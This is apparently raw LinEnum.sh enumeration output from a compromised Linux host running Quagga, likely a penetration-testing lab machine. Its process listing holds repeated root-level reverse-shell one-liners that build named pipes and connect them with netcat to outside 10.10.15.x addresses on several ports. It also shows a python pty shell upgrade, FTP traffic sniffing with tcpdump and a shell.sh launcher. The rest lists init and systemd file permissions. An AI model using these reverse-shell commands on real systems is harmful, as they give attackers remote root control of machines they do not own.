- root 4332 0.0 0.1 11236 2272 ? Ss 21:59 0:00 bash -c ps waux | grep root ; rm /tmp/yy; mkfifo /tmp/yy; cat /tmp/yy | /bin/sh -i 2>&1 | nc 10.10.15.171 1001 > /tmp/yy | grep -v grep | grep -v grep
- root 4338 0.0 0.0 4504 744 ? S 21:59 0:00 /bin/sh -i
- root 4415 0.0 0.1 55652 3876 ? S 22:01 0:00 sudo tcpdump -A port ftp -i eth2
- root 4416 0.0 0.3 24272 6104 ? S 22:01 0:00 tcpdump -A port ftp -i eth2
- root 4451 0.0 0.3 92796 6772 ? Ss 22:02 0:00 sshd: root@notty
- root 4481 0.0 0.1 11236 2076 ? Ss 22:02 0:00 bash -c ps waux | grep root ; rm /tmp/yy; mkfifo /tmp/yy; cat /tmp/yy | /bin/sh -i 2>&1 | nc 10.10.15.171 1001 > /tmp/yy | grep -v grep?l | grep -v grep
- root 4486 0.0 0.0 6164 672 ? S 22:02 0:00 cat /tmp/yy
- root 4487 0.0 0.0 4504 852 ? S 22:02 0:00 /bin/sh -i
- root 4488 0.0 0.0 11300 1724 ? S 22:02 0:00 nc 10.10.15.171 1001
- root 4493 0.0 0.1 55652 3944 ? S 22:03 0:00 sudo tcpdump -A port ftp -i eth2 -w out.pcap
- root 4494 0.0 0.2 20040 5820 ? S 22:03 0:00 tcpdump -A port ftp -i eth2 -w out.pcap
- root 4495 0.0 0.3 92796 6928 ? Ss 22:04 0:00 sshd: root@notty
- root 4525 0.0 0.1 11236 2276 ? Ss 22:04 0:00 bash -c ps waux | grep root ; rm /tmp/yy; mkfifo /tmp/yy; cat /tmp/yy | /bin/sh -i 2>&1 | nc 10.10.15.171 1001 > /tmp/yy | grep -v grep?l | grep -v grep
- root 4530 0.0 0.0 6164 724 ? S 22:04 0:00 cat /tmp/yy
- root 4531 0.0 0.0 4504 1628 ? S 22:04 0:00 /bin/sh -i
- root 4532 0.0 0.0 11300 1596 ? S 22:04 0:00 nc 10.10.15.171 1001
- root 5171 0.0 0.3 92796 6692 ? Ss 22:16 0:00 sshd: root@notty
- root 5201 0.0 0.1 11236 2056 ? Ss 22:16 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 4445 ???\?? | grep -v grep
- root 5206 0.0 0.0 6028 720 ? S 22:16 0:00 cat /tmp/f
- root 5207 0.0 0.0 4504 736 ? S 22:16 0:00 /bin/sh -i
- root 5247 0.0 0.3 92796 6808 ? Ss 22:17 0:00 sshd: root@notty
- root 5277 0.0 0.1 11236 2192 ? Ss 22:17 0:00 bash -c ps waux | grep quagga&&rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.15.100 1234 >/tmp/f | grep -v grep
- root 5282 0.0 0.0 6164 672 ? S 22:17 0:00 cat /tmp/f
- root 5283 0.0 0.1 19896 2772 ? S 22:17 0:00 /bin/bash -i
- root 5284 0.0 0.0 11300 1732 ? S 22:17 0:00 nc 10.10.15.100 1234
- root 5299 0.0 0.3 92796 6728 ? Ss 22:17 0:00 sshd: root@notty
- root 5329 0.0 0.1 11236 2176 ? Ss 22:17 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 4445 ???\?? | grep -v grep
- root 5334 0.0 0.0 6028 768 ? S 22:17 0:00 cat /tmp/f
- root 5335 0.0 0.0 4504 840 ? S 22:17 0:00 /bin/sh -i
- root 5338 0.0 0.4 37496 8852 ? S 22:18 0:00 python3 -c import pty;pty.spawn("/bin/bash")
- root 5339 0.0 0.1 19880 3588 pts/0 Ss+ 22:18 0:00 /bin/bash
- root 5354 0.0 0.3 92796 6732 ? Ss 22:20 0:00 sshd: root@notty
- root 5384 0.0 0.1 11236 2192 ? Ss 22:20 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 4446 ???\?? | grep -v grep
- root 5389 0.0 0.0 6028 828 ? S 22:20 0:00 cat /tmp/f
- root 5390 0.0 0.0 4504 744 ? S 22:20 0:00 /bin/sh -i
- root 5394 0.0 0.3 92796 6920 ? Ss 22:20 0:00 sshd: root@notty
- root 5424 0.0 0.1 11236 2200 ? Ss 22:20 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 4446 ???\?? | grep -v grep
- root 5429 0.0 0.0 6028 692 ? S 22:20 0:00 cat /tmp/f
- root 5430 0.0 0.0 4504 852 ? S 22:20 0:00 /bin/sh -i
- root 5433 0.0 0.3 92796 6784 ? Ss 22:22 0:00 sshd: root@notty
- root 5463 0.0 0.1 11236 2200 ? Ss 22:22 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 4446 ???\?? | grep -v grep
- root 5468 0.0 0.0 6028 676 ? S 22:22 0:00 cat /tmp/f
- root 5469 0.0 0.0 4504 744 ? S 22:22 0:00 /bin/sh -i
- root 5647 0.0 0.3 92796 6860 ? Ss 22:28 0:00 sshd: root@notty
- root 5677 0.0 0.1 11236 2080 ? Ss 22:28 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 4447 ???\?? | grep -v grep
- root 5682 0.0 0.0 6028 668 ? S 22:28 0:00 cat /tmp/f
- root 5683 0.0 0.0 4504 672 ? S 22:28 0:00 /bin/sh -i
- root 5689 0.0 0.3 92796 6860 ? Ss 22:31 0:00 sshd: root@notty
- root 5719 0.0 0.1 11236 2196 ? Ss 22:31 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 9000 ???\?? | grep -v grep
- root 5724 0.0 0.0 6028 720 ? S 22:31 0:00 cat /tmp/f
- root 5725 0.0 0.0 4504 780 ? S 22:31 0:00 /bin/sh -i
- root 5728 0.0 0.3 92796 6784 ? Ss 22:32 0:00 sshd: root@notty
- root 5758 0.0 0.1 11236 2052 ? Ss 22:32 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 9000 ???\?? | grep -v grep
- root 5763 0.0 0.0 6028 668 ? S 22:32 0:00 cat /tmp/f
- root 5764 0.0 0.0 4504 844 ? S 22:32 0:00 /bin/sh -i
- root 5869 0.0 0.3 92796 6764 ? Ss 22:34 0:00 sshd: root@notty
- root 5899 0.0 0.1 11236 2280 ? Ss 22:34 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 9000 ???\?? | grep -v grep
- root 5904 0.0 0.0 6028 816 ? S 22:34 0:00 cat /tmp/f
- root 5905 0.0 0.0 4504 744 ? S 22:34 0:00 /bin/sh -i
- root 5908 0.0 0.3 92796 6964 ? Ss 22:35 0:00 sshd: root@notty
- root 5938 0.0 0.1 11236 2204 ? Ss 22:35 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.10.15.233 9000 ???\?? | grep -v grep
- root 5943 0.0 0.0 6028 692 ? S 22:35 0:00 cat /tmp/f
- root 5944 0.0 0.0 4504 848 ? S 22:35 0:00 /bin/sh -i
- root 5945 99.1 0.0 11300 1584 ? R 22:35 32:32 nc -u 10.10.15.233 9000 ?????
- root 5946 0.0 0.0 12944 1092 ? S 22:35 0:00 grep -v grep
- root 5947 0.0 0.3 92796 6720 ? Ss 22:35 0:00 sshd: root@notty
- root 5977 0.0 0.1 11236 2080 ? Ss 22:35 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.10.15.233 9000 ???\?? | grep -v grep
- root 5982 0.0 0.0 6028 720 ? S 22:35 0:00 cat /tmp/f
- root 5983 0.0 0.0 4504 656 ? S 22:35 0:00 /bin/sh -i
- root 5984 0.0 0.0 11300 1716 ? S 22:35 0:00 nc -u 10.10.15.233 9000 ?????
- root 5985 0.0 0.0 12944 1020 ? S 22:35 0:00 grep -v grep
- root 6063 0.0 0.2 20040 5772 ? S 22:40 0:00 tcpdump -A port ftp -i eth2 -w out.pcap
- root 6064 0.0 0.3 92796 6768 ? Ss 22:41 0:00 sshd: root@notty
- root 6094 0.0 0.1 11236 2116 ? Ss 22:41 0:00 bash -c ps waux | grep root ; rm /tmp/yy; mkfifo /tmp/yy; cat /tmp/yy | /bin/sh -i 2>&1 | nc 10.10.15.171 1001 > /tmp/yy | grep -v grep?l | grep -v grep
- root 6100 0.0 0.0 4504 776 ? S 22:41 0:00 /bin/sh -i
- root 6106 0.0 0.2 20040 5764 ? S 22:46 0:00 tcpdump -A port ftp -i eth2 -w out.pcap -b
- root 6177 0.0 0.3 92796 6856 ? Ss 22:48 0:00 sshd: root@notty
- root 6207 0.0 0.1 11236 2020 ? Ss 22:48 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.10.15.233 9000 ???\?? | grep -v grep
- root 6212 0.0 0.0 6028 688 ? S 22:48 0:00 cat /tmp/f
- root 6213 0.0 0.0 4504 796 ? S 22:48 0:00 /bin/sh -i
- root 6214 99.2 0.0 11300 1708 ? R 22:48 19:38 nc -u 10.10.15.233 9000 ?????
- root 6215 0.0 0.0 12944 1028 ? S 22:48 0:00 grep -v grep
- root 6216 0.0 0.3 92796 6876 ? Ss 22:48 0:00 sshd: root@notty
- root 6246 0.0 0.1 11236 2180 ? Ss 22:48 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 9000 ???\?? | grep -v grep
- root 6251 0.0 0.0 6028 692 ? S 22:48 0:00 cat /tmp/f
- root 6252 0.0 0.0 4504 700 ? S 22:48 0:00 /bin/sh -i
- root 6258 0.0 0.3 92796 6684 ? Ss 22:51 0:00 sshd: root@notty
- root 6288 0.0 0.1 11236 2284 ? Ss 22:51 0:00 bash -c ps waux | grep root ; rm /tmp/ww; mkfifo /tmp/ww; cat /tmp/ww | /bin/sh -i 2>&1 | nc 10.10.15.171 1002 > /tmp/22 | grep -v grep | grep -v grep
- root 6293 0.0 0.0 6028 824 ? S 22:51 0:00 cat /tmp/ww
- root 6294 0.0 0.0 4504 784 ? S 22:51 0:00 /bin/sh -i
- root 6334 0.0 0.3 92796 6872 ? Ss 22:55 0:00 sshd: root@notty
- root 6364 0.0 0.1 11236 2200 ? Ss 22:55 0:00 bash -c ps waux | grep root ; rm /tmp/ww; mkfifo /tmp/ww; cat /tmp/ww | /bin/sh -i 2>&1 | nc 10.10.15.171 1002 > /tmp/22 | grep -v grep | grep -v grep
- root 6369 0.0 0.0 6028 684 ? S 22:55 0:00 cat /tmp/ww
- root 6370 0.0 0.0 4504 752 ? S 22:55 0:00 /bin/sh -i
- root 6451 0.0 0.3 92796 6772 ? Ss 22:57 0:00 sshd: root@notty
- root 6481 0.0 0.1 11236 2196 ? Ss 22:57 0:00 bash -c ps waux | grep root ; rm /tmp/ww; mkfifo /tmp/ww; cat /tmp/ww | /bin/sh -i 2>&1 | nc 10.10.15.171 1002 > /tmp/22 | grep -v grep | grep -v grep
- root 6486 0.0 0.0 6028 672 ? S 22:57 0:00 cat /tmp/ww
- root 6487 0.0 0.0 4504 704 ? S 22:57 0:00 /bin/sh -i
- root 6496 0.0 0.3 92796 6728 ? Ss 22:58 0:00 sshd: root@notty
- root 6526 0.0 0.1 11236 2280 ? Ss 22:58 0:00 bash -c ps waux | grep root ; rm /tmp/w; mkfifo /tmp/w; cat /tmp/w | /bin/sh -i 2>&1 | nc 10.10.15.171 1002 > /tmp/w | grep -v grep | grep -v grep
- root 6531 0.0 0.0 6164 676 ? S 22:58 0:00 cat /tmp/w
- root 6532 0.0 0.0 4504 756 ? S 22:58 0:00 /bin/sh -i
- root 6533 0.0 0.0 11300 1724 ? S 22:58 0:00 nc 10.10.15.171 1002
- root 6540 0.0 0.3 92796 6932 ? Ss 22:59 0:00 sshd: root@notty
- root 6571 0.0 0.1 11236 2264 ? Ss 22:59 0:00 bash -c ps waux | grep root ; rm /tmp/yy; mkfifo /tmp/yy; cat /tmp/yy | /bin/sh -i 2>&1 | nc 10.10.15.171 1001 > /tmp/yy | grep -v grep?l | grep -v grep
- root 6577 0.0 0.0 4504 708 ? S 22:59 0:00 /bin/sh -i
- root 6666 0.0 0.2 20040 5816 ? S 23:01 0:00 tcpdump -A port ftp -i eth2 -w out.pcap -b
- root 6709 0.0 0.3 92796 6772 ? Ss 23:04 0:00 sshd: root@notty
- root 6745 0.0 0.1 11236 2892 ? Ss 23:04 0:00 bash -c ps waux | grep root ; rm /tmp/yy; mkfifo /tmp/yy; cat /tmp/yy | /bin/sh -i 2>&1 | nc 10.10.15.171 1001 > /tmp/yy | grep -v grep?l | grep -v grep
- root 6750 0.0 0.0 6164 696 ? S 23:04 0:00 cat /tmp/yy
- root 6751 0.0 0.0 4504 752 ? S 23:04 0:00 /bin/sh -i
- root 6752 0.0 0.0 11300 1824 ? S 23:04 0:00 nc 10.10.15.171 1001
- quagga 6824 0.0 0.0 24500 1824 ? Ss 23:05 0:00 /usr/lib/quagga/zebra --daemon -A 127.0.0.1
- quagga 6828 0.0 0.1 29448 2788 ? Ss 23:05 0:00 /usr/lib/quagga/bgpd --daemon -A 127.0.0.1
- root 6833 0.0 0.0 15432 164 ? Ss 23:05 0:00 /usr/lib/quagga/watchquagga --daemon zebra bgpd
- root 7124 0.0 0.2 20040 5808 ? S 23:06 0:00 tcpdump -A port ftp -i eth2 -w out.pcap -b
- root 7141 0.0 0.3 92796 6896 ? Ss 23:07 0:00 sshd: root@notty
- root 7171 0.0 0.1 11232 3076 ? Ss 23:07 0:00 bash -c ps waux | grep ; ./shell.sh | grep -v grep
- root 7174 0.0 0.1 11260 2320 ? S 23:07 0:00 bash -c ps waux | grep ; ./shell.sh | grep -v grep
- root 7175 0.0 0.0 12944 1016 ? S 23:07 0:00 grep -v grep
- root 7176 0.0 0.0 4504 788 ? S 23:07 0:00 sh
- root 7178 0.0 0.0 4504 744 ? S 23:07 0:00 /bin/sh -i
- root 7179 0.5 0.4 52340 8168 ? S 23:07 0:00 vi
- root 7180 0.0 0.1 11228 3028 ? S 23:08 0:00 bash
- root 7182 0.0 0.0 4504 784 ? S 23:08 0:00 /bin/sh -i
- root 7217 0.0 0.1 12216 4016 ? S 23:08 0:00 /bin/bash ./LinEnum.sh detailed
- root 7218 0.0 0.1 12352 3652 ? S 23:08 0:00 /bin/bash ./LinEnum.sh detailed
- root 7219 0.0 0.0 6012 672 ? S 23:08 0:00 tee -a
- root 7423 0.0 0.1 12320 2968 ? S 23:08 0:00 /bin/bash ./LinEnum.sh detailed
- root 7424 0.0 0.1 36084 3392 ? R 23:08 0:00 ps aux
- [-] Process binaries and associated permissions (from above list):
- -rwxr-xr-x 1 root root 1037528 May 16 2017 /bin/bash
- lrwxrwxrwx 1 root root 4 Feb 17 2016 /bin/sh -> dash
- -rwxr-xr-x 1 root root 1577232 Mar 8 2018 /lib/systemd/systemd
- -rwxr-xr-x 1 root root 326224 Mar 8 2018 /lib/systemd/systemd-journald
- -rwxr-xr-x 1 root root 618520 Mar 8 2018 /lib/systemd/systemd-logind
- -rwxr-xr-x 1 root root 453240 Mar 8 2018 /lib/systemd/systemd-udevd
- -rwxr-xr-x 1 root root 44104 Nov 30 2017 /sbin/agetty
- lrwxrwxrwx 1 root root 20 Mar 8 2018 /sbin/init -> /lib/systemd/systemd
- -rwxr-xr-x 1 root root 783984 Jul 26 2017 /sbin/iscsid
- -rwxr-xr-x 1 root root 224208 Jan 12 2017 /usr/bin/dbus-daemon
- -rwxr-xr-x 1 root root 164928 Nov 3 2016 /usr/lib/accountsservice/accounts-daemon
- -rwxr-xr-x 1 root root 15048 Jan 17 2016 /usr/lib/policykit-1/polkitd
- -rwxr-xr-x 1 root root 934976 Feb 8 2018 /usr/lib/quagga/bgpd
- -rwxr-xr-x 1 root root 35168 Feb 8 2018 /usr/lib/quagga/watchquagga
- -rwxr-xr-x 1 root root 270224 Feb 8 2018 /usr/lib/quagga/zebra
- -rwxr-xr-x 1 root root 22658024 May 17 2018 /usr/lib/snapd/snapd
- -rwxr-xr-x 1 root root 26632 Jan 14 2016 /usr/sbin/atd
- -rwxr-xr-x 1 root root 44472 Apr 5 2016 /usr/sbin/cron
- -rwxr-xr-x 1 root root 791024 Jan 18 2018 /usr/sbin/sshd
- [-] /etc/init.d/ binary permissions:
- total 304
- drwxr-xr-x 1 root root 1212 Jul 1 2018 .
- drwxr-xr-x 1 root root 2988 Jan 7 21:14 ..
- -rwxr-xr-x 1 root root 2243 Feb 9 2016 acpid
- -rwxr-xr-x 1 root root 6223 Mar 3 2017 apparmor
- -rwxr-xr-x 1 root root 2802 May 24 2018 apport
- -rwxr-xr-x 1 root root 1071 Dec 6 2015 atd
- -rwxr-xr-x 1 root root 1275 Jan 19 2016 bootmisc.sh
- -rwxr-xr-x 1 root root 3807 Jan 19 2016 checkfs.sh
- -rwxr-xr-x 1 root root 1098 Jan 19 2016 checkroot-bootclean.sh
- -rwxr-xr-x 1 root root 9353 Jan 19 2016 checkroot.sh
- -rwxr-xr-x 1 root root 1343 Apr 4 2016 console-setup
- -rwxr-xr-x 1 root root 3049 Apr 5 2016 cron
- -rwxr-xr-x 1 root root 937 Mar 28 2015 cryptdisks
- -rwxr-xr-x 1 root root 896 Mar 28 2015 cryptdisks-early
- -rwxr-xr-x 1 root root 2813 Dec 2 2015 dbus
- -rw-r--r-- 1 root root 1264 Jul 2 2018 .depend.boot
- -rw-r--r-- 1 root root 668 Jul 2 2018 .depend.start
- -rw-r--r-- 1 root root 1061 Jul 2 2018 .depend.stop
- -rwxr-xr-x 1 root root 1336 Jan 19 2016 halt
- -rwxr-xr-x 1 root root 1423 Jan 19 2016 hostname.sh
- -rwxr-xr-x 1 root root 3809 Mar 12 2016 hwclock.sh
- -rwxr-xr-x 1 root root 2372 Apr 11 2016 irqbalance
- -rwxr-xr-x 1 root root 1503 Mar 29 2016 iscsid
- -rwxr-xr-x 1 root root 1804 Apr 4 2016 keyboard-setup
- -rwxr-xr-x 1 root root 1300 Jan 19 2016 killprocs
- -rwxr-xr-x 1 root root 2087 Dec 20 2015 kmod
- -rwxr-xr-x 1 root root 695 Oct 30 2015 lvm2
- -rwxr-xr-x 1 root root 571 Oct 30 2015 lvm2-lvmetad
- -rwxr-xr-x 1 root root 586 Oct 30 2015 lvm2-lvmpolld
- -rwxr-xr-x 1 root root 2378 Nov 9 2017 lxcfs
- -rwxr-xr-x 1 root root 2541 Dec 7 2017 lxd
- -rwxr-xr-x 1 root root 2365 Oct 9 2017 mdadm
- -rwxr-xr-x 1 root root 1199 Jul 16 2014 mdadm-waitidle
- -rwxr-xr-x 1 root root 703 Jan 19 2016 mountall-bootclean.sh
- -rwxr-xr-x 1 root root 2301 Jan 19 2016 mountall.sh
- -rwxr-xr-x 1 root root 1461 Jan 19 2016 mountdevsubfs.sh
- -rwxr-xr-x 1 root root 1564 Jan 19 2016 mountkernfs.sh
- -rwxr-xr-x 1 root root 711 Jan 19 2016 mountnfs-bootclean.sh
- -rwxr-xr-x 1 root root 2456 Jan 19 2016 mountnfs.sh
- -rwxr-xr-x 1 root root 4771 Jul 19 2015 networking
- -rwxr-xr-x 1 root root 1581 Oct 16 2015 ondemand
- -rwxr-xr-x 1 root root 2503 Mar 29 2016 open-iscsi
- -rwxr-xr-x 1 root root 1846 Mar 22 2018 open-vm-tools
- -rwxr-xr-x 1 root root 1366 Nov 15 2015 plymouth
- -rwxr-xr-x 1 root root 752 Nov 15 2015 plymouth-log
- -rwxr-xr-x 1 root root 1192 Sep 6 2015 procps
- -rwxr-xr-x 1 root root 9353 Jan 1 2014 quagga
- -rwxr-xr-x 1 root root 6366 Jan 19 2016 rc
- -rwxr-xr-x 1 root root 820 Jan 19 2016 rc.local
- -rwxr-xr-x 1 root root 117 Jan 19 2016 rcS
- -rw-r--r-- 1 root root 2427 Jan 19 2016 README
- -rwxr-xr-x 1 root root 661 Jan 19 2016 reboot
- -rwxr-xr-x 1 root root 4149 Nov 23 2015 resolvconf
- -rwxr-xr-x 1 root root 4355 Jul 10 2014 rsync
- -rwxr-xr-x 1 root root 2796 Feb 3 2016 rsyslog
- -rwxr-xr-x 1 root root 1226 Jun 9 2015 screen-cleanup
- -rwxr-xr-x 1 root root 3927 Jan 19 2016 sendsigs
- -rwxr-xr-x 1 root root 597 Jan 19 2016 single
- -rw-r--r-- 1 root root 1087 Jan 19 2016 skeleton
- -rwxr-xr-x 1 root root 4077 Mar 16 2017 ssh
- -rwxr-xr-x 1 root root 6087 Apr 12 2016 udev
- -rwxr-xr-x 1 root root 2049 Aug 7 2014 ufw
- -rwxr-xr-x 1 root root 2737 Jan 19 2016 umountfs
- -rwxr-xr-x 1 root root 2202 Jan 19 2016 umountnfs.sh
- -rwxr-xr-x 1 root root 1879 Jan 19 2016 umountroot
- -rwxr-xr-x 1 root root 1391 Apr 20 2017 unattended-upgrades
- -rwxr-xr-x 1 root root 3111 Jan 19 2016 urandom
- -rwxr-xr-x 1 root root 1306 Nov 30 2017 uuidd
- [-] /etc/init/ config file permissions:
- total 208
- drwxr-xr-x 1 root root 1626 Jul 2 2018 .
- drwxr-xr-x 1 root root 2988 Jan 7 21:14 ..
- -rw-r--r-- 1 root root 338 Apr 8 2016 acpid.conf
- -rw-r--r-- 1 root root 3709 Mar 3 2017 apparmor.conf
- -rw-r--r-- 1 root root 1629 May 24 2018 apport.conf
- -rw-r--r-- 1 root root 236 Apr 3 2018 cloud-config.conf
- -rw-r--r-- 1 root root 297 Apr 3 2018 cloud-final.conf
- -rw-r--r-- 1 root root 2556 Apr 3 2018 cloud-init-blocknet.conf
- -rw-r--r-- 1 root root 202 Apr 3 2018 cloud-init.conf
- -rw-r--r-- 1 root root 2024 Apr 3 2018 cloud-init-container.conf
- -rw-r--r-- 1 root root 379 Apr 3 2018 cloud-init-local.conf
- -rw-r--r-- 1 root root 1908 Apr 3 2018 cloud-init-nonet.conf
- -rw-r--r-- 1 root root 562 Apr 3 2018 cloud-log-shutdown.conf
- -rw-r--r-- 1 root root 250 Apr 4 2016 console-font.conf
- -rw-r--r-- 1 root root 7 Jul 1 2018 console.override
- -rw-r--r-- 1 root root 509 Apr 4 2016 console-setup.conf
- -rw-r--r-- 1 root root 297 Apr 5 2016 cron.conf
- -rw-r--r-- 1 root root 1519 Mar 28 2015 cryptdisks.conf
- -rw-r--r-- 1 root root 412 Mar 28 2015 cryptdisks-udev.conf
- -rw-r--r-- 1 root root 482 Sep 1 2015 dbus.conf
- -rw-r--r-- 1 root root 1247 Jun 1 2015 friendly-recovery.conf
- -rw-r--r-- 1 root root 284 Jul 23 2013 hostname.conf
- -rw-r--r-- 1 root root 300 May 21 2014 hostname.sh.conf
- -rw-r--r-- 1 root root 674 Mar 14 2016 hwclock.conf
- -rw-r--r-- 1 root root 561 Mar 14 2016 hwclock-save.conf
- -rw-r--r-- 1 root root 109 Mar 14 2016 hwclock.sh.conf
- -rw-r--r-- 1 root root 597 Apr 11 2016 irqbalance.conf
- -rw-r--r-- 1 root root 689 Aug 20 2015 kmod.conf
- -rw-r--r-- 1 root root 540 Nov 9 2017 lxcfs.conf
- -rw-r--r-- 1 root root 813 Dec 7 2017 lxd.conf
- -rw-r--r-- 1 root root 2493 Jun 2 2015 networking.conf
- -rw-r--r-- 1 root root 933 Jun 2 2015 network-interface.conf
- -rw-r--r-- 1 root root 530 Jun 2 2015 network-interface-container.conf
- -rw-r--r-- 1 root root 1756 Jun 2 2015 network-interface-security.conf
- -rw-r--r-- 1 root root 568 Feb 1 2016 passwd.conf
- -rw-r--r-- 1 root root 264 May 30 2018 pollinate.conf
- -rw-r--r-- 1 root root 119 Jun 5 2014 procps.conf
- -rw-r--r-- 1 root root 363 Jun 5 2014 procps-instance.conf
- -rw-r--r-- 1 root root 457 Jun 3 2015 resolvconf.conf
- -rw-r--r-- 1 root root 426 Dec 2 2015 rsyslog.conf
- -rw-r--r-- 1 root root 7 Jul 2 2018 rsyslog.override
- -rw-r--r-- 1 root root 230 Apr 4 2016 setvtrgb.conf
- -rw-r--r-- 1 root root 641 Mar 16 2017 ssh.conf
- -rw-r--r-- 1 root root 7 Jul 1 2018 tty1.override
- -rw-r--r-- 1 root root 7 Jul 1 2018 tty2.override
- -rw-r--r-- 1 root root 7 Jul 1 2018 tty3.override
- -rw-r--r-- 1 root root 7 Jul 1 2018 tty4.override
- -rw-r--r-- 1 root root 552 Jun 22 2018 ttyS0.conf
- -rw-r--r-- 1 root root 337 Apr 12 2016 udev.conf
- -rw-r--r-- 1 root root 360 Apr 12 2016 udevmonitor.conf
- -rw-r--r-- 1 root root 352 Apr 12 2016 udevtrigger.conf
- -rw-r--r-- 1 root root 473 Aug 7 2014 ufw.conf
- -rw-r--r-- 1 root root 889 Feb 24 2015 ureadahead.conf.disabled
- -rw-r--r-- 1 root root 683 Feb 24 2015 ureadahead-other.conf
- [-] /lib/systemd/* config file permissions:
- /lib/systemd/:
- total 8.2M
- drwxr-xr-x 1 root root 12K Jun 22 2018 system
- drwxr-xr-x 1 root root 688 Jun 22 2018 system-generators
- drwxr-xr-x 1 root root 28 Jun 22 2018 system-shutdown
- drwxr-xr-x 1 root root 12 Jun 22 2018 system-sleep
- drwxr-xr-x 1 root root 128 Jun 22 2018 network
- drwxr-xr-x 1 root root 34 Jun 22 2018 system-preset
- -rwxr-xr-x 1 root root 443K Mar 8 2018 systemd-udevd
- -rwxr-xr-x 1 root root 1.6M Mar 8 2018 systemd
- -rwxr-xr-x 1 root root 47K Mar 8 2018 systemd-binfmt
- -rwxr-xr-x 1 root root 268K Mar 8 2018 systemd-cgroups-agent
- -rwxr-xr-x 1 root root 605K Mar 8 2018 systemd-logind
- -rwxr-xr-x 1 root root 657K Mar 8 2018 systemd-resolved
- -rwxr-xr-x 1 root root 143K Mar 8 2018 systemd-shutdown
- -rwxr-xr-x 1 root root 71K Mar 8 2018 systemd-sleep
- -rwxr-xr-x 1 root root 333K Mar 8 2018 systemd-timedated
- -rwxr-xr-x 1 root root 15K Mar 8 2018 systemd-ac-power
- -rwxr-xr-x 1 root root 103K Mar 8 2018 systemd-bootchart
- -rwxr-xr-x 1 root root 352K Mar 8 2018 systemd-bus-proxyd
- -rwxr-xr-x 1 root root 91K Mar 8 2018 systemd-cryptsetup
- -rwxr-xr-x 1 root root 301K Mar 8 2018 systemd-fsck
- -rwxr-xr-x 1 root root 75K Mar 8 2018 systemd-fsckd
- -rwxr-xr-x 1 root root 31K Mar 8 2018 systemd-hibernate-resume
- -rwxr-xr-x 1 root root 332K Mar 8 2018 systemd-hostnamed
- -rwxr-xr-x 1 root root 340K Mar 8 2018 systemd-localed
- -rwxr-xr-x 1 root root 51K Mar 8 2018 systemd-modules-load
- -rwxr-xr-x 1 root root 123K Mar 8 2018 systemd-networkd-wait-online
- -rwxr-xr-x 1 root root 35K Mar 8 2018 systemd-random-seed
- -rwxr-xr-x 1 root root 51K Mar 8 2018 systemd-remount-fs
- -rwxr-xr-x 1 root root 31K Mar 8 2018 systemd-reply-password
- -rwxr-xr-x 1 root root 91K Mar 8 2018 systemd-socket-proxyd
- -rwxr-xr-x 1 root root 55K Mar 8 2018 systemd-sysctl
- -rwxr-xr-x 1 root root 139K Mar 8 2018 systemd-timesyncd
- -rwxr-xr-x 1 root root 35K Mar 8 2018 systemd-user-sessions
- -rwxr-xr-x 1 root root 55K Mar 8 2018 systemd-activate
- -rwxr-xr-x 1 root root 91K Mar 8 2018 systemd-backlight
- -rwxr-xr-x 1 root root 276K Mar 8 2018 systemd-initctl
- -rwxr-xr-x 1 root root 319K Mar 8 2018 systemd-journald
- -rwxr-xr-x 1 root root 836K Mar 8 2018 systemd-networkd
- -rwxr-xr-x 1 root root 35K Mar 8 2018 systemd-quotacheck
- -rwxr-xr-x 1 root root 91K Mar 8 2018 systemd-rfkill
- -rwxr-xr-x 1 root root 276K Mar 8 2018 systemd-update-utmp
- -rwxr-xr-x 1 root root 1.3K Feb 21 2018 systemd-sysv-install
- /lib/systemd/system:
- total 1.1M
- lrwxrwxrwx 1 root root 9 Jun 22 2018 screen-cleanup.service -> /dev/null
- drwxr-xr-x 1 root root 42 Jun 22 2018 halt.target.wants
- drwxr-xr-x 1 root root 100 Jun 22 2018 initrd-switch-root.target.wants
- drwxr-xr-x 1 root root 44 Jun 22 2018 kexec.target.wants
- drwxr-xr-x 1 root root 376 Jun 22 2018 multi-user.target.wants
- drwxr-xr-x 1 root root 122 Jun 22 2018 poweroff.target.wants
- drwxr-xr-x 1 root root 118 Jun 22 2018 reboot.target.wants
- drwxr-xr-x 1 root root 1.4K Jun 22 2018 sysinit.target.wants
- drwxr-xr-x 1 root root 342 Jun 22 2018 sockets.target.wants
- drwxr-xr-x 1 root root 0 Jun 22 2018 busnames.target.wants
- drwxr-xr-x 1 root root 40 Jun 22 2018 getty.target.wants
- drwxr-xr-x 1 root root 72 Jun 22 2018 graphical.target.wants
- drwxr-xr-x 1 root root 52 Jun 22 2018 local-fs.target.wants
- drwxr-xr-x 1 root root 22 Jun 22 2018 rc-local.service.d
- drwxr-xr-x 1 root root 72 Jun 22 2018 rescue.target.wants
